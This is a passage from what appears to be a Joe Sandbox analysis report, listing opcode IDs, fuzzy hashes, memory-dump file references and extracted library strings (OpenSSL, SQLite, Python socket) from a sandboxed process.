                                                                                                                                                                                                                                                              • Opcode ID: 55a07f998d6ae28afa997e7e159e656449db5a2412ae30cc886daef19bdfb253
                                                                                                                                                                                                                                                              • Instruction ID: 1f4e5a6f57247533c6e74f6fee4b47644e49ce43c2ccd4bc395a65657739fb69
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55a07f998d6ae28afa997e7e159e656449db5a2412ae30cc886daef19bdfb253
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75515FB2A18B8699E750CF68E8405AD37B1FF48B98F544132EB4E93A68DF3CE554C740
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                                              • API String ID: 0-1087561517
                                                                                                                                                                                                                                                              • Opcode ID: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
                                                                                                                                                                                                                                                              • Instruction ID: ead0aa2a9f34a8e4f9ee522bbab56783cc3dc0d1038c0b2f615b5f4fd38e7af6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17D15A65B0EAC365FB54AE629A543F922B5EF957C4F046032DE0EC7B8ADE3DE4058310
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                                              • API String ID: 0-2528746747
                                                                                                                                                                                                                                                              • Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                                                                                                              • Instruction ID: 7d93c594285485eb41571532b4c50df7720580f1e26013cf6aaf0d504d12f946
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01B1AD61B0EAC2B5FB109F61D8401FD67B5EF847C4F415032DA1D87A9AEE7CEA4A8350
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: OiII$Unknown Bluetooth protocol$iy#
                                                                                                                                                                                                                                                              • API String ID: 0-1931379703
                                                                                                                                                                                                                                                              • Opcode ID: 219293d9ed970e924550000fc76a6ba74e53c1685364983c479b9e8f7c0aa3e8
                                                                                                                                                                                                                                                              • Instruction ID: 8e64a6d26a6c986a60b934eea0c35a9e2c0eb45cf49e7a6df7cfb0108a23e593
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 219293d9ed970e924550000fc76a6ba74e53c1685364983c479b9e8f7c0aa3e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D3105A5A087DA81EF648B19A95547DA3A1AF44FC8B444035CB4E97AB0EF3CB465C310
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: getservbyporthtons
                                                                                                                                                                                                                                                              • String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
                                                                                                                                                                                                                                                              • API String ID: 3477891686-2618607128
                                                                                                                                                                                                                                                              • Opcode ID: 08d641e2149a9fe32eb83068231b66dcf87bbcbf43cfed86c6688b5a091640e5
                                                                                                                                                                                                                                                              • Instruction ID: 1c147b61080df09cb2b0e8137fdd86cc5044c6758ca05ce7623b91b6397feb3a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08d641e2149a9fe32eb83068231b66dcf87bbcbf43cfed86c6688b5a091640e5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D721E5A5A18B8B81EB008B1AE99467D6360FF89FC5F505031DB4E57674DE3DF058C710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C61208
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                                                              • API String ID: 3535234312-1635961163
                                                                                                                                                                                                                                                              • Opcode ID: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
                                                                                                                                                                                                                                                              • Instruction ID: 7af022634306f4a539713fa117cf02c7ac05b9ef01100451180c821b37c211d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84028032A0EAC291E7609F15E4803BA77B0EB85BC4F14913ADA9E87795DF3CE591C700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 3568877910-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: d7fded3eb334f82a5bc8ccf9ef76d7075bacc3061919e943a1f5875f096b0b35
                                                                                                                                                                                                                                                              • Instruction ID: d5d255b0e456bc0159e889a5bba3d3f9799b750016e739dc06af8ffdbd98ad66
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7fded3eb334f82a5bc8ccf9ef76d7075bacc3061919e943a1f5875f096b0b35
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AD19B72A0AB8A96DB60CF26E1046A977E4FB88BC4F158136DF8D47790DF78D841C714
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 174288908-0
                                                                                                                                                                                                                                                              • Opcode ID: 7fb88d29fb8f124253cef0c34b5bf16ffbb07c85107e42c4acbe9bd20e36e90a
                                                                                                                                                                                                                                                              • Instruction ID: 783197ea9236e162ad9240ac42c4f5eb3aada25510e06cf2b54911272f8a06ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fb88d29fb8f124253cef0c34b5bf16ffbb07c85107e42c4acbe9bd20e36e90a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF2130A0A197CA81EB649B29A81977E63A1AF48FE4F440735CA6F527F4DF3CF0448700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6113440ErrorLast
                                                                                                                                                                                                                                                              • String ID: NOO$surrogatepass$unsupported address family
                                                                                                                                                                                                                                                              • API String ID: 181156767-472101058
                                                                                                                                                                                                                                                              • Opcode ID: a941ae9730ded8f772822ed8a2d782374302fb04319468ce831e81471515d3c7
                                                                                                                                                                                                                                                              • Instruction ID: 35c3ec7a13b28d699e7d8dac49e5e7334b7d045268b896d4ad13ff7f2bd041c1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a941ae9730ded8f772822ed8a2d782374302fb04319468ce831e81471515d3c7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45713BA2A08BCA86EB558B29A81417D63A1BF94FD8F145535EF5E177A4EF3CF481C300
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8B8AF93C1
                                                                                                                                                                                                                                                              • Base Connection.__init__ not called., xrefs: 00007FF8B8AF931C
                                                                                                                                                                                                                                                              • Cannot operate on a closed database., xrefs: 00007FF8B8AF9383
                                                                                                                                                                                                                                                              • factory must return a cursor, not %.100s, xrefs: 00007FF8B8AF92D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$factory must return a cursor, not %.100s
                                                                                                                                                                                                                                                              • API String ID: 0-2953218143
                                                                                                                                                                                                                                                              • Opcode ID: b0658eab8497ceccf96ffad2f0378969048be266a831a6824d1b9b74aa8d3f40
                                                                                                                                                                                                                                                              • Instruction ID: 115fb9770c2edda0f64b6c7be0c7a5b1ddc5a2e06967f21123ead1c66768ca92
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0658eab8497ceccf96ffad2f0378969048be266a831a6824d1b9b74aa8d3f40
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12712B36A0AA4283EB548F2AD49617873A1FB45FD5F086035DB0E87754DF3DE856830A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
                                                                                                                                                                                                                                                              • API String ID: 0-1751716127
                                                                                                                                                                                                                                                              • Opcode ID: 5769dd5f58e8a9c8f678f8dac09ed95f83273131b51c435cd3570311299641a0
                                                                                                                                                                                                                                                              • Instruction ID: e649758e7d9b123ae1db8695da57d0dd6497ca80998e7beb9dfd42402b4c04f8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5769dd5f58e8a9c8f678f8dac09ed95f83273131b51c435cd3570311299641a0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D3105A1A18BCA81EB609B19E9517BE6361BF88FC4F444032DB4E57669EF3CF544C700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: getservbynamehtons
                                                                                                                                                                                                                                                              • String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
                                                                                                                                                                                                                                                              • API String ID: 3889749166-1257235949
                                                                                                                                                                                                                                                              • Opcode ID: 9dd5b28ce3685dd1532477a6290ebd183478f563b5b65b0de9f645cbc5bcbcda
                                                                                                                                                                                                                                                              • Instruction ID: 0c4841bc3c52a2f9e287e826413d2f29ac4f79fb715aa04e089b5bb1f0e49800
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dd5b28ce3685dd1532477a6290ebd183478f563b5b65b0de9f645cbc5bcbcda
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C811C4A1A08B8B82EB409B1AE95426D6361FF89FC5F500432DB8E67678DF3CF455C740
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeTable$ConvertInterfaceLuidNameTable2
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1671601251-0
                                                                                                                                                                                                                                                              • Opcode ID: a29c778bcafa3f3138a556627d91e743bd76927b8f6cbccc6d47cedd6816eead
                                                                                                                                                                                                                                                              • Instruction ID: 17fa5119370c8421a8ab026265abab27b8f6b9057712f56214b38c8ea66de0c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a29c778bcafa3f3138a556627d91e743bd76927b8f6cbccc6d47cedd6816eead
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22410BB1A08BCA85EB649B29E85427D63A1FF89FD5F440031CB4E666A4DF3CF455CB40
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00007FF8A88334B5
                                                                                                                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FF8A88334DE
                                                                                                                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00007FF8A88337CC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                              • API String ID: 3568877910-272990098
                                                                                                                                                                                                                                                              • Opcode ID: b258cba78216c913fdfc967b650a3a4584fc30d2e89a2d53fb082f1872007e41
